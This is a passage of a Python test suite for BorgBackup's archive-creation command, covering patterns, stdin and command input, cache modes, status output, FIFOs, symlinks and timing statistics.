test_create_duplicate_root(self):\n # setup for #5603\n path_a = os.path.join(self.input_path, \"a\")\n path_b = os.path.join(self.input_path, \"b\")\n os.mkdir(path_a)\n os.mkdir(path_b)\n hl_a = os.path.join(path_a, \"hardlink\")\n hl_b = os.path.join(path_b, \"hardlink\")\n self.create_regular_file(hl_a, contents=b\"123456\")\n os.link(hl_a, hl_b)\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", \"--encryption=none\")\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test\", \"input\", \"input\") # give input twice!\n # test if 
created archive has 'input' contents twice:\n archive_list = self.cmd(f\"--repo={self.repository_location}\", \"list\", \"test\", \"--json-lines\")\n paths = [json.loads(line)[\"path\"] for line in archive_list.split(\"\\n\") if line]\n # we have all fs items exactly once!\n assert sorted(paths) == [\"input\", \"input/a\", \"input/a/hardlink\", \"input/b\", \"input/b/hardlink\"]\n\n def test_unix_socket(self):\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n try:\n sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n sock.bind(os.path.join(self.input_path, \"unix-socket\"))\n except PermissionError as err:\n if err.errno == errno.EPERM:\n pytest.skip(\"unix sockets disabled or not supported\")\n elif err.errno == errno.EACCES:\n pytest.skip(\"permission denied to create unix sockets\")\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test\", \"input\")\n sock.close()\n with changedir(\"output\"):\n self.cmd(f\"--repo={self.repository_location}\", \"extract\", \"test\")\n assert not os.path.exists(\"input/unix-socket\")\n\n @pytest.mark.skipif(not is_utime_fully_supported(), reason=\"cannot properly setup and execute test without utime\")\n @pytest.mark.skipif(\n not is_birthtime_fully_supported(), reason=\"cannot properly setup and execute test without birthtime\"\n )\n def test_nobirthtime(self):\n self.create_test_files()\n birthtime, mtime, atime = 946598400, 946684800, 946771200\n os.utime(\"input/file1\", (atime, birthtime))\n os.utime(\"input/file1\", (atime, mtime))\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test\", \"input\", \"--nobirthtime\")\n with changedir(\"output\"):\n self.cmd(f\"--repo={self.repository_location}\", \"extract\", \"test\")\n sti = os.stat(\"input/file1\")\n sto = os.stat(\"output/input/file1\")\n assert int(sti.st_birthtime * 1e9) == birthtime * 1e9\n assert int(sto.st_birthtime * 1e9) == mtime * 1e9\n assert sti.st_mtime_ns == sto.st_mtime_ns == mtime * 1e9\n\n def test_create_stdin(self):\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n input_data = b\"\\x00foo\\n\\nbar\\n \\n\"\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test\", \"-\", input=input_data)\n item = json.loads(self.cmd(f\"--repo={self.repository_location}\", \"list\", \"test\", \"--json-lines\"))\n assert item[\"uid\"] == 0\n assert item[\"gid\"] == 0\n assert item[\"size\"] == len(input_data)\n assert item[\"path\"] == \"stdin\"\n extracted_data = self.cmd(\n f\"--repo={self.repository_location}\", \"extract\", \"test\", \"--stdout\", binary_output=True\n )\n assert extracted_data == input_data\n\n def test_create_content_from_command(self):\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n input_data = \"some test content\"\n name = \"a/b/c\"\n self.cmd(\n f\"--repo={self.repository_location}\",\n \"create\",\n \"--stdin-name\",\n name,\n \"--content-from-command\",\n \"test\",\n \"--\",\n \"echo\",\n input_data,\n )\n item = json.loads(self.cmd(f\"--repo={self.repository_location}\", \"list\", \"test\", \"--json-lines\"))\n assert item[\"uid\"] == 0\n assert item[\"gid\"] == 0\n assert item[\"size\"] == len(input_data) + 1 # `echo` adds newline\n assert item[\"path\"] == name\n extracted_data = self.cmd(f\"--repo={self.repository_location}\", \"extract\", \"test\", \"--stdout\")\n assert extracted_data == input_data + \"\\n\"\n\n def 
test_create_content_from_command_with_failed_command(self):\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n output = self.cmd(\n f\"--repo={self.repository_location}\",\n \"create\",\n \"--content-from-command\",\n \"test\",\n \"--\",\n \"sh\",\n \"-c\",\n \"exit 73;\",\n exit_code=2,\n )\n assert output.endswith(\"Command 'sh' exited with status 73\\n\")\n archive_list = json.loads(self.cmd(f\"--repo={self.repository_location}\", \"rlist\", \"--json\"))\n assert archive_list[\"archives\"] == []\n\n def test_create_content_from_command_missing_command(self):\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n output = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test\", \"--content-from-command\", exit_code=2)\n assert output.endswith(\"No command given.\\n\")\n\n def test_create_paths_from_stdin(self):\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.create_regular_file(\"file1\", size=1024 * 80)\n self.create_regular_file(\"dir1/file2\", size=1024 * 80)\n self.create_regular_file(\"dir1/file3\", size=1024 * 80)\n self.create_regular_file(\"file4\", size=1024 * 80)\n\n input_data = b\"input/file1\\0input/dir1\\0input/file4\"\n self.cmd(\n f\"--repo={self.repository_location}\",\n \"create\",\n \"test\",\n \"--paths-from-stdin\",\n \"--paths-delimiter\",\n \"\\\\0\",\n input=input_data,\n )\n archive_list = self.cmd(f\"--repo={self.repository_location}\", \"list\", \"test\", \"--json-lines\")\n paths = [json.loads(line)[\"path\"] for line in archive_list.split(\"\\n\") if line]\n assert paths == [\"input/file1\", \"input/dir1\", \"input/file4\"]\n\n def test_create_paths_from_command(self):\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.create_regular_file(\"file1\", size=1024 * 80)\n self.create_regular_file(\"file2\", size=1024 * 80)\n self.create_regular_file(\"file3\", size=1024 * 80)\n self.create_regular_file(\"file4\", size=1024 * 80)\n\n input_data = \"input/file1\\ninput/file2\\ninput/file3\"\n self.cmd(\n f\"--repo={self.repository_location}\", \"create\", \"--paths-from-command\", \"test\", \"--\", \"echo\", input_data\n )\n archive_list = self.cmd(f\"--repo={self.repository_location}\", \"list\", \"test\", \"--json-lines\")\n paths = [json.loads(line)[\"path\"] for line in archive_list.split(\"\\n\") if line]\n assert paths == [\"input/file1\", \"input/file2\", \"input/file3\"]\n\n def test_create_paths_from_command_with_failed_command(self):\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n output = self.cmd(\n f\"--repo={self.repository_location}\",\n \"create\",\n \"--paths-from-command\",\n \"test\",\n \"--\",\n \"sh\",\n \"-c\",\n \"exit 73;\",\n exit_code=2,\n )\n assert output.endswith(\"Command 'sh' exited with status 73\\n\")\n archive_list = json.loads(self.cmd(f\"--repo={self.repository_location}\", \"rlist\", \"--json\"))\n assert archive_list[\"archives\"] == []\n\n def test_create_paths_from_command_missing_command(self):\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n output = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test\", \"--paths-from-command\", exit_code=2)\n assert output.endswith(\"No command given.\\n\")\n\n def test_create_without_root(self):\n \"\"\"test create without a root\"\"\"\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.cmd(f\"--repo={self.repository_location}\", 
\"create\", \"test\", exit_code=2)\n\n def test_create_pattern_root(self):\n \"\"\"test create with only a root pattern\"\"\"\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.create_regular_file(\"file1\", size=1024 * 80)\n self.create_regular_file(\"file2\", size=1024 * 80)\n output = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test\", \"-v\", \"--list\", \"--pattern=R input\")\n self.assert_in(\"A input/file1\", output)\n self.assert_in(\"A input/file2\", output)\n\n def test_create_pattern(self):\n \"\"\"test file patterns during create\"\"\"\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.create_regular_file(\"file1\", size=1024 * 80)\n self.create_regular_file(\"file2\", size=1024 * 80)\n self.create_regular_file(\"file_important\", size=1024 * 80)\n output = self.cmd(\n f\"--repo={self.repository_location}\",\n \"create\",\n \"-v\",\n \"--list\",\n \"--pattern=+input/file_important\",\n \"--pattern=-input/file*\",\n \"test\",\n \"input\",\n )\n self.assert_in(\"A input/file_important\", output)\n self.assert_in(\"x input/file1\", output)\n self.assert_in(\"x input/file2\", output)\n\n def test_create_pattern_file(self):\n \"\"\"test file patterns during create\"\"\"\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.create_regular_file(\"file1\", size=1024 * 80)\n self.create_regular_file(\"file2\", size=1024 * 80)\n self.create_regular_file(\"otherfile\", size=1024 * 80)\n self.create_regular_file(\"file_important\", size=1024 * 80)\n output = self.cmd(\n f\"--repo={self.repository_location}\",\n \"create\",\n \"-v\",\n \"--list\",\n \"--pattern=-input/otherfile\",\n \"--patterns-from=\" + self.patterns_file_path,\n \"test\",\n \"input\",\n )\n self.assert_in(\"A input/file_important\", output)\n self.assert_in(\"x input/file1\", output)\n self.assert_in(\"x input/file2\", output)\n self.assert_in(\"x input/otherfile\", output)\n\n def test_create_pattern_exclude_folder_but_recurse(self):\n \"\"\"test when patterns exclude a parent folder, but include a child\"\"\"\n self.patterns_file_path2 = os.path.join(self.tmpdir, \"patterns2\")\n with open(self.patterns_file_path2, \"wb\") as fd:\n fd.write(b\"+ input/x/b\\n- input/x*\\n\")\n\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.create_regular_file(\"x/a/foo_a\", size=1024 * 80)\n self.create_regular_file(\"x/b/foo_b\", size=1024 * 80)\n self.create_regular_file(\"y/foo_y\", size=1024 * 80)\n output = self.cmd(\n f\"--repo={self.repository_location}\",\n \"create\",\n \"-v\",\n \"--list\",\n \"--patterns-from=\" + self.patterns_file_path2,\n \"test\",\n \"input\",\n )\n self.assert_in(\"x input/x/a/foo_a\", output)\n self.assert_in(\"A input/x/b/foo_b\", output)\n self.assert_in(\"A input/y/foo_y\", output)\n\n def test_create_pattern_exclude_folder_no_recurse(self):\n \"\"\"test when patterns exclude a parent folder and, but include a child\"\"\"\n self.patterns_file_path2 = os.path.join(self.tmpdir, \"patterns2\")\n with open(self.patterns_file_path2, \"wb\") as fd:\n fd.write(b\"+ input/x/b\\n! 
input/x*\\n\")\n\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.create_regular_file(\"x/a/foo_a\", size=1024 * 80)\n self.create_regular_file(\"x/b/foo_b\", size=1024 * 80)\n self.create_regular_file(\"y/foo_y\", size=1024 * 80)\n output = self.cmd(\n f\"--repo={self.repository_location}\",\n \"create\",\n \"-v\",\n \"--list\",\n \"--patterns-from=\" + self.patterns_file_path2,\n \"test\",\n \"input\",\n )\n self.assert_not_in(\"input/x/a/foo_a\", output)\n self.assert_not_in(\"input/x/a\", output)\n self.assert_in(\"A input/y/foo_y\", output)\n\n def test_create_pattern_intermediate_folders_first(self):\n \"\"\"test that intermediate folders appear first when patterns exclude a parent folder but include a child\"\"\"\n self.patterns_file_path2 = os.path.join(self.tmpdir, \"patterns2\")\n with open(self.patterns_file_path2, \"wb\") as fd:\n fd.write(b\"+ input/x/a\\n+ input/x/b\\n- input/x*\\n\")\n\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n\n self.create_regular_file(\"x/a/foo_a\", size=1024 * 80)\n self.create_regular_file(\"x/b/foo_b\", size=1024 * 80)\n with changedir(\"input\"):\n self.cmd(\n f\"--repo={self.repository_location}\",\n \"create\",\n \"--patterns-from=\" + self.patterns_file_path2,\n \"test\",\n \".\",\n )\n\n # list the archive and verify that the \"intermediate\" folders appear before\n # their contents\n out = self.cmd(f\"--repo={self.repository_location}\", \"list\", \"test\", \"--format\", \"{type} {path}{NL}\")\n out_list = out.splitlines()\n\n self.assert_in(\"d x/a\", out_list)\n self.assert_in(\"d x/b\", out_list)\n\n assert out_list.index(\"d x/a\") < out_list.index(\"- x/a/foo_a\")\n assert out_list.index(\"d x/b\") < out_list.index(\"- x/b/foo_b\")\n\n def test_create_no_cache_sync(self):\n self.create_test_files()\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.cmd(f\"--repo={self.repository_location}\", \"rdelete\", \"--cache-only\")\n create_json = json.loads(\n self.cmd(\n f\"--repo={self.repository_location}\", \"create\", \"--no-cache-sync\", \"--json\", \"--error\", \"test\", \"input\"\n )\n ) # ignore experimental warning\n info_json = json.loads(self.cmd(f\"--repo={self.repository_location}\", \"info\", \"-a\", \"test\", \"--json\"))\n create_stats = create_json[\"cache\"][\"stats\"]\n info_stats = info_json[\"cache\"][\"stats\"]\n assert create_stats == info_stats\n self.cmd(f\"--repo={self.repository_location}\", \"rdelete\", \"--cache-only\")\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"--no-cache-sync\", \"test2\", \"input\")\n self.cmd(f\"--repo={self.repository_location}\", \"rinfo\")\n self.cmd(f\"--repo={self.repository_location}\", \"check\")\n\n def test_create_archivename_with_placeholder(self):\n self.create_test_files()\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n ts = \"1999-12-31T23:59:59\"\n name_given = \"test-{now}\" # placeholder in archive name gets replaced by borg\n name_expected = f\"test-{ts}\" # placeholder in f-string gets replaced by python\n self.cmd(f\"--repo={self.repository_location}\", \"create\", f\"--timestamp={ts}\", name_given, \"input\")\n list_output = self.cmd(f\"--repo={self.repository_location}\", \"rlist\", \"--short\")\n assert name_expected in list_output\n\n def test_exclude_caches(self):\n self._create_test_caches()\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test\", \"input\", \"--exclude-caches\")\n 
self._assert_test_caches()\n\n def test_exclude_tagged(self):\n self._create_test_tagged()\n self.cmd(\n f\"--repo={self.repository_location}\",\n \"create\",\n \"test\",\n \"input\",\n \"--exclude-if-present\",\n \".NOBACKUP\",\n \"--exclude-if-present\",\n \"00-NOBACKUP\",\n )\n self._assert_test_tagged()\n\n def test_exclude_keep_tagged(self):\n self._create_test_keep_tagged()\n self.cmd(\n f\"--repo={self.repository_location}\",\n \"create\",\n \"test\",\n \"input\",\n \"--exclude-if-present\",\n \".NOBACKUP1\",\n \"--exclude-if-present\",\n \".NOBACKUP2\",\n \"--exclude-caches\",\n \"--keep-exclude-tags\",\n )\n self._assert_test_keep_tagged()\n\n def test_path_normalization(self):\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.create_regular_file(\"dir1/dir2/file\", size=1024 * 80)\n with changedir(\"input/dir1/dir2\"):\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test\", \"../../../input/dir1/../dir1/dir2/..\")\n output = self.cmd(f\"--repo={self.repository_location}\", \"list\", \"test\")\n self.assert_not_in(\"..\", output)\n self.assert_in(\" input/dir1/dir2/file\", output)\n\n def test_exclude_normalization(self):\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.create_regular_file(\"file1\", size=1024 * 80)\n self.create_regular_file(\"file2\", size=1024 * 80)\n with changedir(\"input\"):\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test1\", \".\", \"--exclude=file1\")\n with changedir(\"output\"):\n self.cmd(f\"--repo={self.repository_location}\", \"extract\", \"test1\")\n self.assert_equal(sorted(os.listdir(\"output\")), [\"file2\"])\n with changedir(\"input\"):\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test2\", \".\", \"--exclude=./file1\")\n with changedir(\"output\"):\n self.cmd(f\"--repo={self.repository_location}\", \"extract\", \"test2\")\n self.assert_equal(sorted(os.listdir(\"output\")), [\"file2\"])\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test3\", \"input\", \"--exclude=input/./file1\")\n with changedir(\"output\"):\n self.cmd(f\"--repo={self.repository_location}\", \"extract\", \"test3\")\n self.assert_equal(sorted(os.listdir(\"output/input\")), [\"file2\"])\n\n def test_repeated_files(self):\n self.create_regular_file(\"file1\", size=1024 * 80)\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test\", \"input\", \"input\")\n\n @pytest.mark.skipif(\"BORG_TESTS_IGNORE_MODES\" in os.environ, reason=\"modes unreliable\")\n def test_umask(self):\n self.create_regular_file(\"file1\", size=1024 * 80)\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test\", \"input\")\n mode = os.stat(self.repository_path).st_mode\n self.assertEqual(stat.S_IMODE(mode), 0o700)\n\n def test_create_dry_run(self):\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"--dry-run\", \"test\", \"input\")\n # Make sure no archive has been created\n with Repository(self.repository_path) as repository:\n manifest = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)\n self.assert_equal(len(manifest.archives), 0)\n\n def test_progress_on(self):\n self.create_regular_file(\"file1\", size=1024 * 80)\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", 
RK_ENCRYPTION)\n output = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test4\", \"input\", \"--progress\")\n self.assert_in(\"\\r\", output)\n\n def test_progress_off(self):\n self.create_regular_file(\"file1\", size=1024 * 80)\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n output = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test5\", \"input\")\n self.assert_not_in(\"\\r\", output)\n\n def test_file_status(self):\n \"\"\"test that various file status show expected results\n\n clearly incomplete: only tests for the weird \"unchanged\" status for now\"\"\"\n self.create_regular_file(\"file1\", size=1024 * 80)\n time.sleep(1) # file2 must have newer timestamps than file1\n self.create_regular_file(\"file2\", size=1024 * 80)\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n output = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"--list\", \"test\", \"input\")\n self.assert_in(\"A input/file1\", output)\n self.assert_in(\"A input/file2\", output)\n # should find first file as unmodified\n output = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"--list\", \"test2\", \"input\")\n self.assert_in(\"U input/file1\", output)\n # this is expected, although surprising, for why, see:\n # https://borgbackup.readthedocs.org/en/latest/faq.html#i-am-seeing-a-added-status-for-a-unchanged-file\n self.assert_in(\"A input/file2\", output)\n\n def test_file_status_cs_cache_mode(self):\n \"\"\"test that a changed file with faked \"previous\" mtime still gets backed up in ctime,size cache_mode\"\"\"\n self.create_regular_file(\"file1\", contents=b\"123\")\n time.sleep(1) # file2 must have newer timestamps than file1\n self.create_regular_file(\"file2\", size=10)\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n output = self.cmd(\n f\"--repo={self.repository_location}\", \"create\", \"test1\", \"input\", \"--list\", \"--files-cache=ctime,size\"\n )\n # modify file1, but cheat with the mtime (and atime) and also keep same size:\n st = os.stat(\"input/file1\")\n self.create_regular_file(\"file1\", contents=b\"321\")\n os.utime(\"input/file1\", ns=(st.st_atime_ns, st.st_mtime_ns))\n # this mode uses ctime for change detection, so it should find file1 as modified\n output = self.cmd(\n f\"--repo={self.repository_location}\", \"create\", \"test2\", \"input\", \"--list\", \"--files-cache=ctime,size\"\n )\n self.assert_in(\"M input/file1\", output)\n\n def test_file_status_ms_cache_mode(self):\n \"\"\"test that a chmod'ed file with no content changes does not get chunked again in mtime,size cache_mode\"\"\"\n self.create_regular_file(\"file1\", size=10)\n time.sleep(1) # file2 must have newer timestamps than file1\n self.create_regular_file(\"file2\", size=10)\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n output = self.cmd(\n f\"--repo={self.repository_location}\", \"create\", \"--list\", \"--files-cache=mtime,size\", \"test1\", \"input\"\n )\n # change mode of file1, no content change:\n st = os.stat(\"input/file1\")\n os.chmod(\"input/file1\", st.st_mode ^ stat.S_IRWXO) # this triggers a ctime change, but mtime is unchanged\n # this mode uses mtime for change detection, so it should find file1 as unmodified\n output = self.cmd(\n f\"--repo={self.repository_location}\", \"create\", \"--list\", \"--files-cache=mtime,size\", \"test2\", \"input\"\n )\n self.assert_in(\"U input/file1\", output)\n\n def 
test_file_status_rc_cache_mode(self):\n \"\"\"test that files get rechunked unconditionally in rechunk,ctime cache mode\"\"\"\n self.create_regular_file(\"file1\", size=10)\n time.sleep(1) # file2 must have newer timestamps than file1\n self.create_regular_file(\"file2\", size=10)\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n output = self.cmd(\n f\"--repo={self.repository_location}\", \"create\", \"--list\", \"--files-cache=rechunk,ctime\", \"test1\", \"input\"\n )\n # no changes here, but this mode rechunks unconditionally\n output = self.cmd(\n f\"--repo={self.repository_location}\", \"create\", \"--list\", \"--files-cache=rechunk,ctime\", \"test2\", \"input\"\n )\n self.assert_in(\"A input/file1\", output)\n\n def test_file_status_excluded(self):\n \"\"\"test that excluded paths are listed\"\"\"\n\n self.create_regular_file(\"file1\", size=1024 * 80)\n time.sleep(1) # file2 must have newer timestamps than file1\n self.create_regular_file(\"file2\", size=1024 * 80)\n if has_lchflags:\n self.create_regular_file(\"file3\", size=1024 * 80)\n platform.set_flags(os.path.join(self.input_path, \"file3\"), stat.UF_NODUMP)\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n output = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"--list\", \"--exclude-nodump\", \"test\", \"input\")\n self.assert_in(\"A input/file1\", output)\n self.assert_in(\"A input/file2\", output)\n if has_lchflags:\n self.assert_in(\"x input/file3\", output)\n # should find second file as excluded\n output = self.cmd(\n f\"--repo={self.repository_location}\",\n \"create\",\n \"test1\",\n \"input\",\n \"--list\",\n \"--exclude-nodump\",\n \"--exclude\",\n \"*/file2\",\n )\n self.assert_in(\"U input/file1\", output)\n self.assert_in(\"x input/file2\", output)\n if has_lchflags:\n self.assert_in(\"x input/file3\", output)\n\n def test_file_status_counters(self):\n \"\"\"Test file status counters in the stats of `borg create --stats`\"\"\"\n\n def to_dict(borg_create_output):\n borg_create_output = borg_create_output.strip().splitlines()\n borg_create_output = [line.split(\":\", 1) for line in borg_create_output]\n borg_create_output = {\n key: int(value)\n for key, value in borg_create_output\n if key in (\"Added files\", \"Unchanged files\", \"Modified files\")\n }\n return borg_create_output\n\n # Test case set up: create a repository\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n # Archive an empty dir\n result = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"--stats\", \"test_archive\", self.input_path)\n result = to_dict(result)\n assert result[\"Added files\"] == 0\n assert result[\"Unchanged files\"] == 0\n assert result[\"Modified files\"] == 0\n # Archive a dir with two added files\n self.create_regular_file(\"testfile1\", contents=b\"test1\")\n time.sleep(0.01) # testfile2 must have newer timestamps than testfile1\n self.create_regular_file(\"testfile2\", contents=b\"test2\")\n result = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"--stats\", \"test_archive2\", self.input_path)\n result = to_dict(result)\n assert result[\"Added files\"] == 2\n assert result[\"Unchanged files\"] == 0\n assert result[\"Modified files\"] == 0\n # Archive a dir with 1 unmodified file and 1 modified\n self.create_regular_file(\"testfile1\", contents=b\"new data\")\n result = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"--stats\", \"test_archive3\", self.input_path)\n result = 
to_dict(result)\n # Should process testfile2 as added because of\n # https://borgbackup.readthedocs.io/en/stable/faq.html#i-am-seeing-a-added-status-for-an-unchanged-file\n assert result[\"Added files\"] == 1\n assert result[\"Unchanged files\"] == 0\n assert result[\"Modified files\"] == 1\n\n def test_create_json(self):\n self.create_regular_file(\"file1\", size=1024 * 80)\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n create_info = json.loads(self.cmd(f\"--repo={self.repository_location}\", \"create\", \"--json\", \"test\", \"input\"))\n # The usual keys\n assert \"encryption\" in create_info\n assert \"repository\" in create_info\n assert \"cache\" in create_info\n assert \"last_modified\" in create_info[\"repository\"]\n\n archive = create_info[\"archive\"]\n assert archive[\"name\"] == \"test\"\n assert isinstance(archive[\"command_line\"], list)\n assert isinstance(archive[\"duration\"], float)\n assert len(archive[\"id\"]) == 64\n assert \"stats\" in archive\n\n def test_create_topical(self):\n self.create_regular_file(\"file1\", size=1024 * 80)\n time.sleep(1) # file2 must have newer timestamps than file1\n self.create_regular_file(\"file2\", size=1024 * 80)\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n # no listing by default\n output = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test\", \"input\")\n self.assert_not_in(\"file1\", output)\n # shouldn't be listed even if unchanged\n output = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test0\", \"input\")\n self.assert_not_in(\"file1\", output)\n # should list the file as unchanged\n output = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test1\", \"input\", \"--list\", \"--filter=U\")\n self.assert_in(\"file1\", output)\n # should *not* list the file as changed\n output = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test2\", \"input\", \"--list\", \"--filter=AM\")\n self.assert_not_in(\"file1\", output)\n # change the file\n self.create_regular_file(\"file1\", size=1024 * 100)\n # should list the file as changed\n output = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test3\", \"input\", \"--list\", \"--filter=AM\")\n self.assert_in(\"file1\", output)\n\n @pytest.mark.skipif(not are_fifos_supported(), reason=\"FIFOs not supported\")\n def test_create_read_special_symlink(self):\n from threading import Thread\n\n def fifo_feeder(fifo_fn, data):\n fd = os.open(fifo_fn, os.O_WRONLY)\n try:\n os.write(fd, data)\n finally:\n os.close(fd)\n\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n data = b\"foobar\" * 1000\n\n fifo_fn = os.path.join(self.input_path, \"fifo\")\n link_fn = os.path.join(self.input_path, \"link_fifo\")\n os.mkfifo(fifo_fn)\n os.symlink(fifo_fn, link_fn)\n\n t = Thread(target=fifo_feeder, args=(fifo_fn, data))\n t.start()\n try:\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"--read-special\", \"test\", \"input/link_fifo\")\n finally:\n t.join()\n with changedir(\"output\"):\n self.cmd(f\"--repo={self.repository_location}\", \"extract\", \"test\")\n fifo_fn = \"input/link_fifo\"\n with open(fifo_fn, \"rb\") as f:\n extracted_data = f.read()\n assert extracted_data == data\n\n def test_create_read_special_broken_symlink(self):\n os.symlink(\"somewhere does not exist\", os.path.join(self.input_path, \"link\"))\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n 
self.cmd(f\"--repo={self.repository_location}\", \"create\", \"--read-special\", \"test\", \"input\")\n output = self.cmd(f\"--repo={self.repository_location}\", \"list\", \"test\")\n assert \"input/link -> somewhere does not exist\" in output\n\n def test_log_json(self):\n self.create_test_files()\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n log = self.cmd(\n f\"--repo={self.repository_location}\", \"create\", \"test\", \"input\", \"--log-json\", \"--list\", \"--debug\"\n )\n messages = {} # type -> message, one of each kind\n for line in log.splitlines():\n msg = json.loads(line)\n messages[msg[\"type\"]] = msg\n\n file_status = messages[\"file_status\"]\n assert \"status\" in file_status\n assert file_status[\"path\"].startswith(\"input\")\n\n log_message = messages[\"log_message\"]\n assert isinstance(log_message[\"time\"], float)\n assert log_message[\"levelname\"] == \"DEBUG\" # there should only be DEBUG messages\n assert isinstance(log_message[\"message\"], str)\n\n def test_common_options(self):\n self.create_test_files()\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n log = self.cmd(f\"--repo={self.repository_location}\", \"--debug\", \"create\", \"test\", \"input\")\n assert \"security: read previous location\" in log\n\n def test_hashing_time(self):\n def extract_hashing_time(borg_create_output):\n borg_create_output = borg_create_output.strip().splitlines()\n borg_create_output = [line.split(\":\", 1) for line in borg_create_output]\n hashing_time = [line for line in borg_create_output if line[0] == \"Time spent in hashing\"].pop()\n hashing_time = hashing_time[1]\n hashing_time = float(hashing_time.removesuffix(\" seconds\"))\n return hashing_time\n\n # Test case set up: create a repository and a file\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", \"--encryption=none\")\n self.create_regular_file(\"testfile\", contents=randbytes(6000000))\n # Archive\n result = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"--stats\", \"test_archive\", self.input_path)\n hashing_time = extract_hashing_time(result)\n\n assert hashing_time > 0.0\n\n def test_chunking_time(self):\n def extract_chunking_time(borg_create_output):\n borg_create_output = borg_create_output.strip().splitlines()\n borg_create_output = [line.split(\":\", 1) for line in borg_create_output]\n chunking_time = [line for line in borg_create_output if line[0] == \"Time spent in chunking\"].pop()\n chunking_time = chunking_time[1]\n chunking_time = float(chunking_time.removesuffix(\" seconds\"))\n return chunking_time\n\n # Test case set up: create a repository and a file\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.create_regular_file(\"testfile\", contents=randbytes(5000000))\n # Archive\n result = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"--stats\", \"test_archive\", self.input_path)\n chunking_time = extract_chunking_time(result)\n\n assert chunking_time > 0.0\n\n\nclass 